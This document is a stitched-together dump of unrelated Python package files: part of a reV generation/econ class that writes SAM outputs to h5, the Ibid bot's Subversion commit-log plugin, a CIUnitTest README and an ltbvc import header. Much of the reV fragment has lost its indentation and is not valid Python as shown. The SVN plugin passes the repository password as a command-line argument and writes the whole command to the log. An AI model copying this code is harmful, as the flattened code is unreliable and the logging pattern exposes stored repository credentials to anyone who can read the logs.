            Output variables requested from SAM.
        scale_outputs : bool
            Flag to scale outputs in-place immediately upon returning data.

        Returns
        -------
        out : dict
            Output dictionary from the SAM reV_run function. Data is scaled
            within this function to the datatype specified in cls.OUT_ATTRS.
        """
def _parse_site_data(self, inp):
"""Parse site-specific data from input arg
Parameters
----------
inp : str | pd.DataFrame | None
Site data in .csv or pre-extracted dataframe format. None signifies
that there is no extra site-specific data and that everything is
fully defined in the input h5 and SAM json configs.
Returns
-------
site_data : pd.DataFrame
Site-specific data for econ calculation. Rows correspond to sites,
columns are variables.
"""
if inp is None or inp is False:
# no input, just initialize dataframe with site gids as index
site_data = pd.DataFrame(index=self.project_points.sites)
site_data.index.name = 'gid'
else:
# explicit input, initialize df
if isinstance(inp, str):
if inp.endswith('.csv'):
site_data = pd.read_csv(inp)
elif isinstance(inp, pd.DataFrame):
site_data = inp
else:
# site data was not able to be set. Raise error.
raise Exception('Site data input must be .csv or '
'dataframe, but received: {}'.format(inp))
if 'gid' not in site_data and site_data.index.name != 'gid':
# require gid as column label or index
raise KeyError('Site data input must have "gid" column '
'to match reV site gid.')
# pylint: disable=no-member
if site_data.index.name != 'gid':
# make gid the dataframe index if not already
site_data = site_data.set_index('gid', drop=True)
if 'offshore' in site_data:
if site_data['offshore'].sum() > 1:
w = ('Found offshore sites in econ site data input. '
'This functionality has been deprecated. '
'Please run the reV offshore module to '
'calculate offshore wind lcoe.')
warn(w, OffshoreWindInputWarning)
logger.warning(w)
return site_data
    def add_site_data_to_pp(self, site_data):
        """Add the site df (site-specific inputs) to project points dataframe.

        This ensures that only the relevant site's data will be passed through
        to parallel workers when points_control is iterated and split.

        Parameters
        ----------
        site_data : pd.DataFrame
            Site-specific data for econ calculation. Rows correspond to sites,
            columns are variables.
        """
        # join on the site_data index name ('gid' after _parse_site_data)
        self.project_points.join_df(site_data, key=self.site_data.index.name)

    @abstractmethod
    def _parse_output_request(self, req):
        """Set the output variables requested from the user.

        Abstract: concrete Gen/Econ subclasses supply the implementation.

        Parameters
        ----------
        req : list | tuple
            Output variables requested from SAM.

        Returns
        -------
        output_request : list
            Output variables requested from SAM.
        """
def _get_data_shape(self, dset, n_sites):
"""Get the output array shape based on OUT_ATTRS or PySAM.Outputs.
Parameters
----------
dset : str
Variable name to get shape for.
n_sites : int
Number of sites for this data shape.
Returns
-------
shape : tuple
1D or 2D shape tuple for dset.
"""
if dset in self.OUT_ATTRS:
return self._get_data_shape_from_out_attrs(dset, n_sites)
if dset in self.project_points.all_sam_input_keys:
return self._get_data_shape_from_sam_config(dset, n_sites)
return self._get_data_shape_from_pysam(dset, n_sites)
def _get_data_shape_from_out_attrs(self, dset, n_sites):
"""Get data shape from ``OUT_ATTRS`` variable"""
if self.OUT_ATTRS[dset]['type'] == 'array':
return (len(self.time_index), n_sites)
return (n_sites,)
def _get_data_shape_from_sam_config(self, dset, n_sites):
"""Get data shape from SAM input config """
data = list(self.project_points.sam_inputs.values())[0][dset]
if isinstance(data, (list, tuple, np.ndarray)):
return (*np.array(data).shape, n_sites)
if isinstance(data, str):
msg = ('Cannot pass through non-scalar SAM input key "{}" '
'as an output_request!'.format(dset))
logger.error(msg)
raise ExecutionError(msg)
return (n_sites, )
    def _get_data_shape_from_pysam(self, dset, n_sites):
        """Get data shape from PySAM output object"""
        # lazily build a default PySAM object once; reused on later calls
        if self._sam_obj_default is None:
            self._sam_obj_default = self.sam_module.default()

        try:
            out_data = getattr(self._sam_obj_default.Outputs, dset)
        except AttributeError as e:
            msg = ('Could not get data shape for dset "{}" '
                   'from object "{}". '
                   'Received the following error: "{}"'
                   .format(dset, self._sam_obj_default, e))
            logger.error(msg)
            raise ExecutionError(msg) from e

        if isinstance(out_data, (int, float, str)):
            return (n_sites,)

        # heuristic: a length that divides evenly into the time index length
        # is treated as a (time, site) profile; otherwise keep its own length
        if len(out_data) % len(self.time_index) == 0:
            return (len(self.time_index), n_sites)
        return (len(out_data), n_sites)

    def _init_fpath(self, out_fpath, module):
        """Combine directory and filename, ensure .h5 ext., make out dirs."""
        if out_fpath is None:
            return

        project_dir, out_fn = os.path.split(out_fpath)

        # ensure output file is an h5
        if not out_fn.endswith('.h5'):
            out_fn += '.h5'

        # tag the module name into the filename if not already present
        if module not in out_fn:
            extension_with_module = "_{}.h5".format(module)
            out_fn = out_fn.replace(".h5", extension_with_module)

        # ensure year is in out_fpath
        if self.year is not None and str(self.year) not in out_fn:
            extension_with_year = "_{}.h5".format(self.year)
            out_fn = out_fn.replace(".h5", extension_with_year)

        # create and use optional output dir
        if project_dir and not os.path.exists(project_dir):
            os.makedirs(project_dir, exist_ok=True)

        self._out_fpath = os.path.join(project_dir, out_fn)
        # NOTE(review): run_attrs records the raw input path, not the
        # resolved self._out_fpath — confirm whether that is intended.
        self._run_attrs['out_fpath'] = out_fpath

    def _init_h5(self, mode='w'):
        """Initialize the single h5 output file with all output requests.

        Parameters
        ----------
        mode : str
            Mode to instantiate h5py.File instance
        """
        if self._out_fpath is None:
            return

        if 'w' in mode:
            logger.info('Initializing full output file: "{}" with mode: {}'
                        .format(self._out_fpath, mode))
        elif 'a' in mode:
            logger.info('Appending data to output file: "{}" with mode: {}'
                        .format(self._out_fpath, mode))

        # collect per-dataset units/scale/chunk/dtype/shape specs; datasets
        # missing from OUT_ATTRS fall back to the 'other' attribute entry
        attrs = {d: {} for d in self.output_request}
        chunks = {}
        dtypes = {}
        shapes = {}

        # flag to write time index if profiles are being output
        write_ti = False

        for dset in self.output_request:

            tmp = 'other'
            if dset in self.OUT_ATTRS:
                tmp = dset

            attrs[dset]['units'] = self.OUT_ATTRS[tmp].get('units',
                                                           'unknown')
            attrs[dset]['scale_factor'] = \
                self.OUT_ATTRS[tmp].get('scale_factor', 1)
            chunks[dset] = self.OUT_ATTRS[tmp].get('chunks', None)
            dtypes[dset] = self.OUT_ATTRS[tmp].get('dtype', 'float32')
            shapes[dset] = self._get_data_shape(dset, len(self.meta))
            if len(shapes[dset]) > 1:
                write_ti = True

        # only write time index if profiles were found in output request
        if write_ti:
            ti = self.time_index
        else:
            ti = None

        Outputs.init_h5(self._out_fpath, self.output_request, shapes,
                        attrs, chunks, dtypes, self.meta, time_index=ti,
                        configs=self.sam_metas, run_attrs=self.run_attrs,
                        mode=mode)
def _init_out_arrays(self, index_0=0):
"""Initialize output arrays based on the number of sites that can be
stored in memory safely.
Parameters
----------
index_0 : int
This is the site list index (not gid) for the first site in the
output data. If a node cannot process all sites in-memory at once,
this is used to segment the sites in the current output chunk.
"""
self._out = {}
self._finished_sites = []
# Output chunk is the index range (inclusive) of this set of site outs
self._out_chunk = (index_0, np.min((index_0 + self.site_limit,
len(self.project_points) - 1)))
self._out_n_sites = int(self.out_chunk[1] - self.out_chunk[0]) + 1
logger.info('Initializing in-memory outputs for {} sites with gids '
'{} through {} inclusive (site list index {} through {})'
.format(self._out_n_sites,
self.project_points.sites[self.out_chunk[0]],
self.project_points.sites[self.out_chunk[1]],
self.out_chunk[0], self.out_chunk[1]))
for request in self.output_request:
dtype = 'float32'
if request in self.OUT_ATTRS and self.scale_outputs:
dtype = self.OUT_ATTRS[request].get('dtype', 'float32')
shape = self._get_data_shape(request, self._out_n_sites)
# initialize the output request as an array of zeros
self._out[request] = np.zeros(shape, dtype=dtype)
def _check_sam_version_inputs(self):
"""Check the PySAM version and input keys. Fix where necessary."""
for key, parameters in self.project_points.sam_inputs.items():
updated = PySamVersionChecker.run(self.tech, parameters)
sam_obj = self._points_control._project_points._sam_config_obj
sam_obj._inputs[key] = updated
def unpack_output(self, site_gid, site_output):
"""Unpack a SAM SiteOutput object to the output attribute.
Parameters
----------
site_gid : int
Resource-native site gid (index).
site_output : dict
SAM site output object.
"""
# iterate through the site results
for var, value in site_output.items():
if var not in self._out:
raise KeyError('Tried to collect output variable "{}", but it '
'was not yet initialized in the output '
'dictionary.')
# get the index in the output array for the current site
i = self.site_index(site_gid, out_index=True)
# check to see if we have exceeded the current output chunk.
# If so, flush data to disk and reset the output initialization
if i + 1 > self._out_n_sites:
self.flush()
global_site_index = self.site_index(site_gid)
self._init_out_arrays(index_0=global_site_index)
i = self.site_index(site_gid, out_index=True)
if isinstance(value, (list, tuple, np.ndarray)):
if not isinstance(value, np.ndarray):
value = np.array(value)
self._out[var][:, i] = value.T
elif value != 0:
self._out[var][i] = value
def site_index(self, site_gid, out_index=False):
"""Get the index corresponding to the site gid.
Parameters
----------
site_gid : int
Resource-native site index (gid).
out_index : bool
Option to get output index (if true) which is the column index in
the current in-memory output array, or (if false) the global site
index from the project points site list.
Returns
-------
index : int
Global site index if out_index=False, otherwise column index in
the current in-memory output array.
"""
# get the index for site_gid in the (global) project points site list.
global_site_index = self.project_points.sites.index(site_gid)
if not out_index:
output_index = global_site_index
else:
output_index = global_site_index - self.out_chunk[0]
if output_index < 0:
raise ValueError('Attempting to set output data for site with '
'gid {} to global site index {}, which was '
'already set based on the current output '
'index chunk of {}'
.format(site_gid, global_site_index,
self.out_chunk))
return output_index
def flush(self):
"""Flush the output data in self.out attribute to disk in .h5 format.
The data to be flushed is accessed from the instance attribute
"self.out". The disk target is based on the instance attributes
"self._out_fpath". Data is not flushed if _fpath is None or if .out is
empty.
"""
# handle output file request if file is specified and .out is not empty
if isinstance(self._out_fpath, str) and self._out:
logger.info('Flushing outputs to disk, target file: "{}"'
.format(self._out_fpath))
# get the slice of indices to write outputs to
islice = slice(self.out_chunk[0], self.out_chunk[1] + 1)
# open output file in append mode to add output results to
with Outputs(self._out_fpath, mode='a') as f:
# iterate through all output requests writing each as a dataset
for dset, arr in self._out.items():
if len(arr.shape) == 1:
# write array of scalars
f[dset, islice] = arr
else:
# write 2D array of profiles
f[dset, :, islice] = arr
logger.debug('Flushed output successfully to disk.')
def _pre_split_pc(self, pool_size=os.cpu_count() * 2):
"""Pre-split project control iterator into sub chunks to further
split the parallelization.
Parameters
----------
pool_size : int
Number of futures to submit to a single process pool for
parallel futures.
Returns
-------
N : int
Total number of points control split instances.
pc_chunks : list
List of lists of points control split instances.
"""
N = 0
pc_chunks = []
i_chunk = []
for i, split in enumerate(self.points_control):
N += 1
i_chunk.append(split)
if (i + 1) % pool_size == 0:
pc_chunks.append(i_chunk)
i_chunk = []
if i_chunk:
pc_chunks.append(i_chunk)
logger.debug('Pre-splitting points control into {} chunks with the '
'following chunk sizes: {}'
.format(len(pc_chunks), [len(x) for x in pc_chunks]))
return N, pc_chunks
def _parallel_run(self, max_workers=None, pool_size=os.cpu_count() * 2,
timeout=1800, **kwargs):
"""Execute parallel compute.
Parameters
----------
max_workers : None | int
Number of workers. None will default to cpu count.
pool_size : int
Number of futures to submit to a single process pool for
parallel futures.
timeout : int | float
Number of seconds to wait for parallel run iteration to complete
before returning zeros.
kwargs : dict
Keyword arguments to self._run_single_worker().
"""
max_workers = os.cpu_count() if max_workers is None else max_workers
logger.info('Running parallel execution with max_workers={}'
.format(max_workers))
i = 0
N, pc_chunks = self._pre_split_pc(pool_size=pool_size)
for j, pc_chunk in enumerate(pc_chunks):
logger.debug('Starting process pool for points control '
'iteration {} out of {}'
.format(j + 1, len(pc_chunks)))
failed_futures = False
chunks = {}
futures = []
loggers = [__name__, 'reV.gen', 'reV.econ', 'reV']
with SpawnProcessPool(max_workers=max_workers,
loggers=loggers) as exe:
for pc in pc_chunk:
future = exe.submit(self._run_single_worker, pc, **kwargs)
futures.append(future)
chunks[future] = pc
for future in futures:
i += 1
try:
result = future.result(timeout=timeout)
except TimeoutError:
failed_futures = True
sites = chunks[future].project_points.sites
result = self._handle_failed_future(future, i, sites,
timeout)
self.out = result
mem = psutil.virtual_memory()
m = ('Parallel run at iteration {0} out of {1}. '
'Memory utilization is {2:.3f} GB out of {3:.3f} GB '
'total ({4:.1f}% used, intended limit of {5:.1f}%)'
.format(i, N, mem.used / 1e9, mem.total / 1e9,
100 * mem.used / mem.total,
100 * self.mem_util_lim))
logger.info(m)
if failed_futures:
logger.info('Forcing pool shutdown after failed futures.')
exe.shutdown(wait=False)
logger.info('Forced pool shutdown complete.')
self.flush()
def _handle_failed_future(self, future, i, sites, timeout):
"""Handle a failed future and return zeros.
Parameters
----------
future : concurrent.futures.Future
Failed future to cancel.
i : int
Iteration number for logging
sites : list
List of site gids belonging to this failed future.
timeout : int
Number of seconds to wait for parallel run iteration to complete
before returning zeros.
"""
w = ('Iteration {} hit the timeout limit of {} seconds! Passing zeros.'
.format(i, timeout))
logger.warning(w)
warn(w, OutputWarning)
site_out = {k: 0 for k in self.output_request}
result = {site: site_out for site in sites}
try:
cancelled = future.cancel()
except Exception as e:
w = 'Could not cancel future! Received exception: {}'.format(e)
logger.warning(w)
warn(w, ParallelExecutionWarning)
if not cancelled:
w = 'Could not cancel future!'
logger.warning(w)
warn(w, ParallelExecutionWarning)
return result | PypiClean |
/Ibid-0.1.1.tar.gz/Ibid-0.1.1/ibid/plugins/svn.py | from datetime import datetime, timedelta
import logging
import os.path
from os import kill
from signal import SIGTERM
import textwrap
import ibid
from ibid.compat import ElementTree as ET, dt_strptime
from subprocess import Popen, PIPE
from time import time, sleep, mktime
# Can use either pysvn or command-line svn
try:
import pysvn
except:
pysvn = None
from ibid.plugins import Processor, match, RPC, authorise
from ibid.config import DictOption, FloatOption, Option, BoolOption
from ibid.utils import ago, format_date, human_join
# plugin metadata consumed by ibid's feature/help machinery
features = {'svn': {
    'description': u'Retrieves commit logs from a Subversion repository.',
    'categories': ('development', 'lookup',),
}}

# sentinel meaning "use the repository's latest revision"; compared by
# identity ("is"), so a fresh object() is sufficient
HEAD_REVISION = object()
class Branch(object):
def __init__(self, repository_name = None, url = None, username = None, password = None, multiline = False):
self.repository = repository_name
self.url = url
self.username = username
self.password = password
self.multiline = multiline
def get_commits(self, start_revision = None, end_revision = None, limit = None, full = False):
"""
Get formatted commit messages for each of the commits in range
[start_revision:end_revision], defaulting to the latest revision.
"""
if not full: # such as None
full = False
if not start_revision:
start_revision = HEAD_REVISION
start_revision = self._convert_to_revision(start_revision)
# If no end-revision and no limit given, set limit to 1
if not end_revision:
end_revision = 0
if not limit:
limit = 1
end_revision = self._convert_to_revision(end_revision)
log_messages = self.log(start_revision, end_revision, limit=limit, paths=full)
commits = [self.format_log_message(log_message, full) for log_message in log_messages]
return commits
def _generate_delta(self, changed_paths):
class T(object):
pass
delta = T()
delta.basepath = "/"
delta.added = []
delta.modified = []
delta.removed = []
delta.renamed = []
action_mapper = {
'M': delta.modified,
'A': delta.added,
'D': delta.removed,
}
all_paths = [changed_path.path for changed_path in changed_paths]
commonprefix = os.path.commonprefix(all_paths)
# os.path.commonprefix will return "/e" if you give it "/etc/passwd"
# and "/exports/foo", which is not what we want. Remove until the last
# "/" character.
while commonprefix and commonprefix[-1] != "/":
commonprefix = commonprefix[:-1]
pathinfo = commonprefix
if commonprefix.startswith("/trunk/"):
commonprefix = "/trunk/"
pathinfo = " [trunk]"
if commonprefix.startswith("/branches/"):
commonprefix = "/branches/%s" % (commonprefix.split('/')[2],)
pathinfo = " [" + commonprefix.split('/')[2] + "]"
if commonprefix.startswith("/tags/"):
commonprefix = "/tags/%s" % (commonprefix.split('/')[2],)
pathinfo = " [" + commonprefix.split('/')[2] + "]"
for changed_path in changed_paths:
action_mapper[changed_path.action].append([changed_path.path[len(commonprefix):], None])
return pathinfo, delta
def format_log_message(self, log_message, full=False):
"""
author - string - the name of the author who committed the revision
date - float time - the date of the commit
message - string - the text of the log message for the commit
revision - pysvn.Revision - the revision of the commit
changed_paths - list of dictionaries. Each dictionary contains:
path - string - the path in the repository
action - string
copyfrom_path - string - if copied, the original path, else None
copyfrom_revision - pysvn.Revision - if copied, the revision of the original, else None
"""
revision_number = log_message['revision'].number
author = log_message['author']
commit_message = log_message['message']
timestamp = log_message['date']
if full:
pathinfo, delta = self._generate_delta(log_message['changed_paths'])
changes = []
if delta.added:
if self.multiline:
changes.append('Added:\n\t%s' % '\n\t'.join([file[0] for file in delta.added]))
else:
changes.append('Added: %s' % ', '.join([file[0] for file in delta.added]))
if delta.modified:
if self.multiline:
changes.append('Modified:\n\t%s' % '\n\t'.join([file[0] for file in delta.modified]))
else:
changes.append('Modified: %s' % '\, '.join([file[0] for file in delta.modified]))
if delta.removed:
if self.multiline:
changes.append('Removed:\n\t%s' % '\n\t'.join([file[0] for file in delta.removed]))
else:
changes.append('Removed: %s' % ', '.join([file[0] for file in delta.removed]))
if delta.renamed:
changes.append('Renamed: %s' % ', '.join(['%s => %s' % (file[0], file[1]) for file in delta.renamed]))
timestamp_dt = datetime.utcfromtimestamp(timestamp)
if self.multiline:
commit = 'Commit %s by %s to %s%s on %s at %s:\n\n\t%s \n\n%s\n' % (
revision_number,
author,
self.repository,
pathinfo,
format_date(timestamp_dt, 'date'),
format_date(timestamp_dt, 'time'),
u'\n'.join(textwrap.wrap(commit_message, initial_indent=" ", subsequent_indent=" ")),
'\n\n'.join(changes))
else:
commit = 'Commit %s by %s to %s%s on %s at %s: %s (%s)\n' % (
revision_number,
author,
self.repository,
pathinfo,
format_date(timestamp_dt, 'date'),
format_date(timestamp_dt, 'time'),
commit_message.replace('\n', ' '),
'; '.join(changes))
else:
commit = 'Commit %s by %s to %s %s ago: %s\n' % (
revision_number,
author,
self.repository,
ago(datetime.now() - datetime.fromtimestamp(timestamp), 2),
commit_message.replace('\n', ' '))
return commit
class PySVNBranch(Branch):
    """Branch implementation backed by the pysvn library."""

    def _call_command(self, command, *args, **kw):
        """Instantiates SVN command class <command> with the stored
        credentials and invokes it with <args> and <kw>."""
        return command(self, username=self.username, password=self.password)(*args, **kw)

    def log(self, *args, **kw):
        """
        Low-level SVN logging call - returns lists of pysvn.PysvnLog objects.
        """
        return self._call_command(SVNLog, *args, **kw)

    def _convert_to_revision(self, revision):
        """
        Convert numbers to pysvn.Revision instances
        """
        if revision is HEAD_REVISION:
            return pysvn.Revision(pysvn.opt_revision_kind.head)
        # pysvn.Revision instances are recognized by their 'kind'
        # attribute; anything else is taken to be a revision number
        # (the previous bare 'except:' could also mask unrelated errors)
        if hasattr(revision, "kind"):
            return revision
        return pysvn.Revision(pysvn.opt_revision_kind.number, revision)
class CommandLineChangedPath(object):
    """Plain data holder mirroring pysvn's changed-path objects; the
    attributes 'kind', 'action' and 'path' are assigned externally by
    CommandLineBranch._xml_to_log_message."""
    pass
class TimeoutException(Exception):
    """Raised when the external svn command exceeds its allotted runtime."""
    pass
class CommandLineRevision(object):
    """Minimal stand-in for pysvn.Revision: only carries the revision
    number parsed from the XML log output."""
    def __init__(self, number):
        # revision number as taken from the XML 'revision' attribute
        self.number = number
class CommandLineBranch(Branch):
    """Branch implementation that invokes the 'svn' command-line client
    and parses its XML log output; used when pysvn is unavailable."""

    def __init__(self, repository_name = None, url = None, username = None, password = None, svn_command = 'svn', svn_timeout = 15.0, multiline = False):
        """Extends Branch by <svn_command>, the path of the svn
        executable, and <svn_timeout>, the maximum run time in seconds
        allowed for a single svn invocation."""
        super(CommandLineBranch, self).__init__(repository_name, url, username, password, multiline=multiline)
        self.svn_command = svn_command
        self.svn_timeout = svn_timeout

    def _convert_to_revision(self, revision):
        # the command-line client accepts plain revision numbers as-is
        return revision

    def log(self, start_revision, end_revision, paths=False, limit=1):
        """Runs 'svn log' for the branch URL and returns the parsed log
        entries; raises TimeoutException when the external process takes
        longer than self.svn_timeout seconds."""
        # fixed: use the configured executable instead of hard-coded "svn"
        cmd = [self.svn_command, "log", "--no-auth-cache", "--non-interactive", "--xml"]
        if paths:
            cmd.append("-v")
        if self.username:
            cmd.append("--username")
            cmd.append(self.username)
        if self.password:
            cmd.append("--password")
            cmd.append(self.password)
        if limit:
            cmd.append("--limit")
            cmd.append(str(limit))
        if start_revision is None or start_revision is HEAD_REVISION:
            # no explicit range: let svn default to the latest revisions
            pass
        else:
            if not end_revision or start_revision == end_revision:
                if not limit:
                    # start revision given, but no distinct end revision
                    # and no limit: fetch exactly that single revision
                    cmd.append("-r")
                    cmd.append(str(start_revision))
                    cmd.append("--limit")
                    cmd.append("1")
                else:
                    cmd.append("-r")
                    cmd.append("%i" % (start_revision,))
            else:
                cmd.append("-r")
                cmd.append("%i:%i" % (end_revision, start_revision))
        cmd.append(self.url)
        logging.getLogger('plugins.svn').info(str(cmd))
        svnlog = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE)
        svnlog.stdin.close()
        # poll until the process finishes or the timeout expires
        start_time = time()
        while svnlog.poll() is None and time() - start_time < self.svn_timeout:
            sleep(0.1)
        if svnlog.poll() is None:
            kill(svnlog.pid, SIGTERM)
            raise TimeoutException()
        output = svnlog.stdout.read()
        return self._xml_to_log_message(output)

    def _xmldate_to_timestamp(self, xmldate):
        """Converts an svn XML date (ISO format with fractional seconds)
        into Unix epoch seconds (float, local time via mktime)."""
        # strip fractional seconds / suffix before parsing
        xmldate = xmldate.split('.')[0]
        dt = dt_strptime(xmldate, "%Y-%m-%dT%H:%M:%S")
        return mktime(dt.timetuple())

    def _xml_to_log_message(self, output):
        """
        Parses 'svn log --xml' output into log entry dictionaries with:
        author - string - the name of the author who committed the revision
        date - float time - the date of the commit
        message - string - the text of the log message for the commit
        revision - CommandLineRevision - the revision of the commit
        changed_paths - list of CommandLineChangedPath objects carrying
            'kind', 'action' and 'path'
        """
        doc = ET.fromstring(output)
        entries = []
        for logentry in doc:
            entry = dict(
                revision = CommandLineRevision(logentry.get('revision')),
                author = logentry.findtext("author"),
                date = self._xmldate_to_timestamp(logentry.findtext("date")),
                message = logentry.findtext("msg"),
            )
            entry['changed_paths'] = []
            paths = logentry.find("paths")
            # fixed: compare against None; relying on Element truthiness
            # is deprecated (and falsy for an empty <paths/> element)
            if paths is not None:
                for path in paths:
                    cp = CommandLineChangedPath()
                    cp.kind = path.get('kind')
                    cp.action = path.get('action')
                    cp.path = path.text
                    entry['changed_paths'].append(cp)
            entries.append(entry)
        return entries
class SVNCommand(object):
    """Base class for pysvn command objects: sets up a pysvn client with
    login and cancellation callbacks; subclasses implement _command()."""

    def __init__(self, branch, username=None, password=None):
        """Stores <branch> and optional credentials and creates the
        underlying pysvn client."""
        self._branch = branch
        self._username = username
        self._password = password
        self._client = self._initClient(branch)

    def _initClient(self, branch):
        """Creates a pysvn client wired up with the login callback and a
        cancellation-after-timeout callback."""
        client = pysvn.Client()
        client.callback_get_login = self.get_login
        client.callback_cancel = CancelAfterTimeout()
        return client

    def get_login(self, realm, username, may_save):
        """pysvn login callback: returns the stored credentials (never
        allowing pysvn to save them) or signals failure when no
        credentials are configured."""
        if self._username and self._password:
            return True, self._username.encode('utf-8'), self._password.encode('utf-8'), False
        return False, None, None, False

    def _initCommand(self):
        """Arms the cancellation timeout before a command runs."""
        self._client.callback_cancel.start()

    def _destroyCommand(self):
        """Notifies the cancellation callback that the command is done."""
        self._client.callback_cancel.done()

    def __call__(self, *args, **kw):
        # fixed: _destroyCommand() used to be unreachable dead code after
        # the return statement; try/finally guarantees it runs now
        self._initCommand()
        try:
            return self._command(*args, **kw)
        finally:
            self._destroyCommand()
class SVNLog(SVNCommand):
    """SVN command object wrapping the pysvn 'log' operation."""

    def _command(self, start_revision=HEAD_REVISION, end_revision=None, paths=False, stop_on_copy=True, limit=1):
        """Fetches up to <limit> log entries of the branch between
        <start_revision> and <end_revision>, optionally including the
        changed paths and stopping at copy points."""
        client = self._client
        messages = client.log(self._branch.url,
                              revision_start=start_revision,
                              revision_end=end_revision,
                              discover_changed_paths=paths,
                              strict_node_history=stop_on_copy,
                              limit=limit)
        return messages
class CancelAfterTimeout(object):
    """
    Cancellation callback handed to pysvn: once armed via start(), it
    reports True as soon as the configured timeout has elapsed.
    """

    def __init__(self, timeout = 15):
        """Stores the <timeout> in seconds applied to each command."""
        self.timeout = timeout

    def start(self):
        """Arms the deadline: the command may run until now + timeout."""
        deadline = datetime.now() + timedelta(seconds=self.timeout)
        self.cancel_at = deadline

    def __call__(self):
        """Returns whether the armed deadline has already passed."""
        now = datetime.now()
        return now > self.cancel_at

    def done(self):
        """Called after the command has finished; nothing to clean up."""
        pass
class Subversion(Processor, RPC):
    """ibid processor exposing Subversion commit information: users can
    query the last commit or a specific revision per repository, and
    remote systems may announce commits via the RPC interface."""

    usage = u"""(last commit|commit <revno>) [to <repo>] [full]
    (svnrepos|svnrepositories)
    """
    feature = ('svn',)
    autoload = False
    permission = u'svn'

    # configurable options (set in the ibid configuration file)
    repositories = DictOption('repositories', 'Dict of repositories names and URLs')
    svn_command = Option('svn_command', 'Path to svn executable', 'svn')
    svn_timeout = FloatOption('svn_timeout', 'Maximum svn execution time (sec)', 15.0)
    multiline = BoolOption('multiline', 'Output multi-line (Jabber, Campfire)', False)

    def __init__(self, name):
        # note: 'self.log' holds the logger here (not a log method)
        self.log = logging.getLogger('plugins.svn')
        Processor.__init__(self, name)
        RPC.__init__(self)

    def setup(self):
        """Builds one Branch object per configured repository, preferring
        pysvn when it is importable and falling back to the command-line
        client otherwise."""
        self.branches = {}
        for name, repository in self.repositories.items():
            reponame = name.lower()
            if pysvn:
                self.branches[reponame] = PySVNBranch(reponame, repository['url'], username = repository['username'], password = repository['password'], multiline=self.multiline)
            else:
                self.branches[reponame] = CommandLineBranch(reponame, repository['url'], username = repository['username'], password = repository['password'], svn_command=self.svn_command, svn_timeout=self.svn_timeout, multiline=self.multiline)

    @match(r'^svn ?(?:repos|repositories)$')
    @authorise()
    def handle_repositories(self, event):
        """Replies with the list of known repository names."""
        repositories = self.branches.keys()
        if repositories:
            event.addresponse(u'I know about: %s', human_join(sorted(repositories)))
        else:
            event.addresponse(u"I don't know about any repositories")

    def remote_committed(self, repository, start, end=None):
        """RPC entry point: announces commits [start:end] of <repository>
        on the repository's configured source and channel."""
        commits = self.get_commits(repository, start, end)
        repo = self.repositories[repository]
        for commit in commits:
            ibid.dispatcher.send({'reply': commit.strip(),
                'source': repo['source'],
                'target': repo['channel'],
                })
        return True

    @match(r'^(?:last\s+)?commit(?:\s+(\d+))?(?:(?:\s+to)?\s+(\S+?))?(\s+full)?$')
    @authorise()
    def commit(self, event, revno, repository, full):
        """Replies with commit <revno> (or the latest commit) of
        <repository>; a trailing 'full' requests changed-path details."""
        # the regex cannot distinguish a repository literally named
        # 'full' from the trailing 'full' flag, hence this fix-up
        if repository == "full":
            repository = None
            full = True
        if full:
            full = True
        # NOTE(review): 'revno and int(revno) or None' maps revision "0"
        # to None as well — presumably harmless, but confirm
        revno = revno and int(revno) or None
        commits = self.get_commits(repository, revno, full=full)
        if commits:
            for commit in commits:
                if commit:
                    event.addresponse(commit.strip())

    def get_commits(self, repository, start, end=None, full=None):
        """Returns formatted commit messages from <repository> (or the
        first configured repository when None is given); returns None
        when the repository is unknown."""
        branch = None
        if repository:
            repository = repository.lower()
            if repository not in self.branches:
                return None
            branch = self.branches[repository]
        if not branch:
            # fall back to an arbitrary (first) configured repository
            # NOTE(review): dict.items()[0] only works on Python 2;
            # Python 3 would need list(self.branches.items())[0]
            (repository, branch) = self.branches.items()[0]
        if not start:
            start = HEAD_REVISION
        if not end:
            end = None
        commits = branch.get_commits(start, end_revision=end, full=full)
        return commits
# vi: set et sta sw=4 ts=4: | PypiClean |
/CIUnitTest-1.0.9-py3-none-any.whl/CIUnitTest-1.0.9.dist-info/DESCRIPTION.rst | CI Unit Test
============
CI Unit Test is a library that makes it possible to retrieve the results of unit tests in JSON format. This may be used in custom Continuous Integration systems that need to process the results of unit tests.
The results can be saved as is to a NoSQL database, or can be returned as a Python object in order to be combined with other information before being saved.
Usage
-----
The results in JSON format can be obtained by using `JsonTestRunner`:
.. code:: python
suite = unittest.TestLoader().loadTestsFromTestCase(TestsDemo)
json = ciunittest.JsonTestRunner().run(suite, formatted=True)
print(json)
Since the first line uses unittest, all unittest features are available, such as the auto-discovery of unit tests in a project directory:
.. code:: python
suite = unittest.TestLoader().discover(targetPath)
To obtain the results as a Python object, use `ObjectTestRunner`:
.. code:: python
suite = unittest.TestLoader().loadTestsFromTestCase(TestsDemo)
result = ciunittest.ObjectTestRunner().run(suite)
print('Done %d tests in %d ms.' %
(len(result['results']), result['spentMilliseconds']))
To perform an action at the beginning of every test (independently of the runner being used,) do:
.. code:: python
suite = unittest.TestLoader().loadTestsFromTestCase(TestsDemo)
runner = ciunittest.JsonTestRunner()
runner.on_start = lambda test: print(".", end="", flush=True)
result = runner.run(suite)
...
In the previous code sample, every time the runner is ready to start a new test, a dot is displayed in the terminal.
Similarly, one can execute arbitrary code at the end of every test. The test result, that is `ciunittest.Success`, `ciunittest.Error` or `ciunittest.Failure`, will be passed as a second parameter to the function.
.. code:: python
runner.on_end = lambda test, result: print(result, flush=True)
The code is inspired by http://pythonhosted.org/gchecky/unittest-pysrc.html
If you have any questions or remarks, please contact me at arseni.mourzenko@pelicandd.com. Criticism is also welcome, since I have used Python for only a few days and probably get lots of things wrong.
| PypiClean |
/LilypondToBandVideoConverter-1.1.1.tar.gz/LilypondToBandVideoConverter-1.1.1/lilypondtobvc/src/convertermodules/ltbvc.py |
#====================
# IMPORTS
#====================
import argparse
import re
from basemodules.datatypesupport import SETATTR
from basemodules.operatingsystem import OperatingSystem
from basemodules.simplelogging import Logging
from basemodules.simpletypes import Boolean, Callable, List, Map, \
Natural, String, StringList, \
StringMap, StringSet, Tuple
from basemodules.stringutil import deserializeToList
from basemodules.ttbase import iif
from basemodules.validitychecker import ValidityChecker
from .audiotrackmanager import AudioTrackManager
from .lilypondfilegenerator import LilypondFile
from .lilypondpngvideogenerator import LilypondPngVideoGenerator
from .ltbvc_businesstypes import TrackSettings
from .ltbvc_configurationdatahandler import LTBVC_ConfigurationData
from .miditransformer import MidiTransformer
from .videoaudiocombiner import VideoAudioCombiner
#====================
# TYPE DEFINITIONS
#====================
